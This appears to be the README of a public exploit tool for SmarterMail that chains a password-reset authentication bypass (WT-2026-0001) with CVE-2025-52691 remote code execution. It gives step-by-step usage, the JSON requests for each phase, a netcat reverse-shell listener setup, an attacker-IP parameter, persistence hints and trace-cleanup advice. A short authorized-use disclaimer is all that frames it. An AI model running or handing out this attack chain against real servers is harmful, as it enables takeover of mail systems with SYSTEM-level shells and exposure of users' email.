Share
## https://sploitus.com/exploit?id=A6B71B64-5075-56F9-BE34-9159A476DC2F
# CVE-2025-52691 / WT-2026-0001 SmarterMail Exploit
## ๐จ IMPORTANT NOTICE
**This tool is for authorized security testing and educational purposes only!**
- **Unauthorized use is illegal and unethical**
- **Only use on systems with explicit authorization**
- **Use at your own risk**
- **Users are responsible for compliance with all applicable laws**
---
## ๐ Overview
This exploit combines two critical vulnerabilities in SmarterMail:
1. **CVE-2025-52691**: Pre-Auth Remote Code Execution via File Upload
- CVSS Score: 10.0 (Critical)
- Affected Versions: Build 9406 and earlier, Build 16.3.6989.16341 and earlier
- Fixed Versions: Build 9413 and later
https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691
2. **WT-2026-0001**: Authentication Bypass via Password Reset
- CVE-ID not assigned
- Affected Versions: Up to Build 9510
- Fixed Versions: Build 9511 (January 15, 2026)
https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/
### Attack Vector
The exploit performs a 3-phase attack:
1. **Phase 1**: Authentication Bypass via WT-2026-0001
- Change admin password without verification of old password
2. **Phase 2**: Admin Login with new password
- Authenticate to SmarterMail Web Interface
3. **Phase 3**: RCE via Volume Mounts functionality
- Create a Volume Mount with Reverse Shell Command
- Execute OS commands with SYSTEM privileges
---
## Prerequisites
### System Requirements
- **Python 3.6+**
- **Netcat (nc)**
- **curl**
- **Linux/macOS/Windows (WSL)**
### Installation Instructions
```bash
# Install Python 3 (if not available)
# Ubuntu/Debian
sudo apt update && sudo apt install python3 python3-pip
# macOS
brew install python3
# Windows (WSL)
wsl --install
# Install netcat
# Ubuntu/Debian
sudo apt install netcat
# macOS
brew install netcat
# Windows (WSL)
sudo apt install netcat-traditional
```
### Install Dependencies
```bash
# Python dependencies (if needed)
pip3 install requests
```
---
## Quick Start
### Method 1: Automated Setup (Recommended)
```bash
# Make executable
chmod +x run_exploit.sh
# Automated setup
./run_exploit.sh --auto
# Or interactive setup
./run_exploit.sh
```
### Method 2: Direct Execution
```bash
# Setup listener (in one terminal)
nc -lvnp 4444
# Run exploit (in a second terminal)
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444
```
### Method 3: With All Options
```bash
python3 exploit.py \
-H http://192.168.1.100 \
-P 9998 \
-A 192.168.1.50 \
-p 4444 \
-d \
--admin-username admin \
--new-password "MySecurePassword123!"
```
---
## Detailed Instructions
### Step 1: Preparation
1. **Target Identification**
```bash
# Check target host
curl -I http://192.168.1.100:9998
# Identify SmarterMail version
# (Usually in login page or HTTP headers)
```
2. **Listener Setup**
```bash
# In Terminal 1: Start listener
nc -lvnp 4444
# The listener must be running before the exploit is executed
```
3. **Network Validation**
```bash
# Ensure connection between attacker and target is possible
ping 192.168.1.100
nc -zv 192.168.1.100 9998
```
### Step 2: Exploit Execution
```bash
# With the runner script (recommended)
./run_exploit.sh
# Or directly with Python
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444
```
### Step 3: After Exploit
1. **Shell Connection**
```bash
# In the listener terminal, a connection should now appear
# You should have a SYSTEM shell
```
2. **Verify Access**
```bash
# In the obtained shell
whoami
hostname
ipconfig /all # Windows
ifconfig # Linux
```
3. **Persistent Access**
```bash
# Optional: Set up persistence
# Windows: Install as service
# Linux: Cron job or systemd service
```
---
## ๐ง Configuration Options
### Exploit.py Parameters
| Parameter | Description | Default Value |
|-----------|-------------|---------------|
| `-H, --host` | Target host (required) | - |
| `-P, --port` | Target port | 9998 |
| `-A, --attacker-ip` | Attacker IP for reverse shell (required) | - |
| `-p, --attacker-port` | Attacker port for reverse shell (required) | - |
| `-d, --debug` | Enable debug mode | False |
| `--admin-username` | Admin username | admin |
| `--new-password` | New admin password | NewPassword123!@# |
### Run_Exploit.sh Parameters
| Parameter | Description |
|-----------|-------------|
| `-t, --target` | Target host |
| `-p, --port` | Target port |
| `-a, --attacker-ip` | Attacker IP |
| `-l, --listener-port` | Listener port |
| `-n, --new-password` | New admin password |
| `-u, --admin-user` | Admin username |
| `-d, --debug` | Debug mode |
| `--auto` | Automated mode |
---
## Examples
### Example 1: Basic Usage
```bash
# Terminal 1: Start listener
nc -lvnp 4444
# Terminal 2: Run exploit
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444
```
### Example 2: With Custom Credentials
```bash
python3 exploit.py \
-H https://mail.company.com \
-P 443 \
-A 10.0.0.1 \
-p 8080 \
--admin-username administrator \
--new-password "ComplexPassword123!@#"
```
### Example 3: Debug Mode
```bash
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d
```
### Example 4: Automated Setup
```bash
./run_exploit.sh --auto
```
---
## Technical Details
### Phase 1: Authentication Bypass
**Endpoint**: `POST /api/v1/auth/force-reset-password`
**Payload**:
```json
{
"IsSysAdmin": "true",
"OldPassword": "dummy",
"Username": "admin",
"NewPassword": "NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"
}
```
**Success Response**:
```json
{
"success": true,
"resultCode": 200,
"debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n"
}
```
### Phase 2: Admin Login
**Endpoint**: `POST /api/v1/auth/login`
**Payload**:
```json
{
"username": "admin",
"password": "NewPassword123!@#"
}
```
### Phase 3: RCE via Volume Mounts
**Endpoint**: `POST /api/v1/settings/volume-mounts`
**Payload**:
```json
{
"name": "random_volume_name",
"path": "C:\\Temp\\random_volume_name",
"command": "powershell reverse shell command",
"enabled": true,
"type": "command"
}
```
---
## Troubleshooting
### Common Issues
#### 1. Port blocked
```bash
# Error: "Connection refused"
# Solution: Check firewall and open port
sudo ufw allow 9998
```
#### 2. Listener not reachable
```bash
# Error: "Connection failed"
# Solution: Check listener setup
nc -lvnp 4444
```
#### 3. Authentication failed
```bash
# Error: "Login failed"
# Solution: Check target version (must be vulnerable)
```
#### 5. RCE failed
```bash
# Error: "Volume mount creation failed"
# Solution: Check admin privileges, target system
```
### Debug Mode
Enable debug mode for detailed output:
```bash
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d
```
---
## โ ๏ธ Security Notes
### Legal Aspects
- **Only perform authorized tests**
- **Obtain written permission**
- **Ensure compliance with local laws**
- **No testing on production systems**
### Security Precautions
1. **Test Environment**: Always test in controlled environments
2. **Target Validation**: Ensure target is a test system
3. **Network Isolation**: Separate test systems from production network
4. **Documentation**: Document all tests
5. **Cleanup**: Remove all traces after testing
### Responsible Use
- **Do not cause damage**
- **Do not steal or manipulate data**
- **Do not disable systems**
- **Be transparent to responsible parties**
---
## Updates and Maintenance
### Version Notes
- **v1.0**: Initial version with full functionality
- **Future Updates**: Improvements to error handling and stability
## ๐ Acknowledgments
- **watchTowr Labs** for the original research
- **Security Research Community** for support
- **All who contributed to improvements**
---
**โ ๏ธ Remember: With great power comes great responsibility!**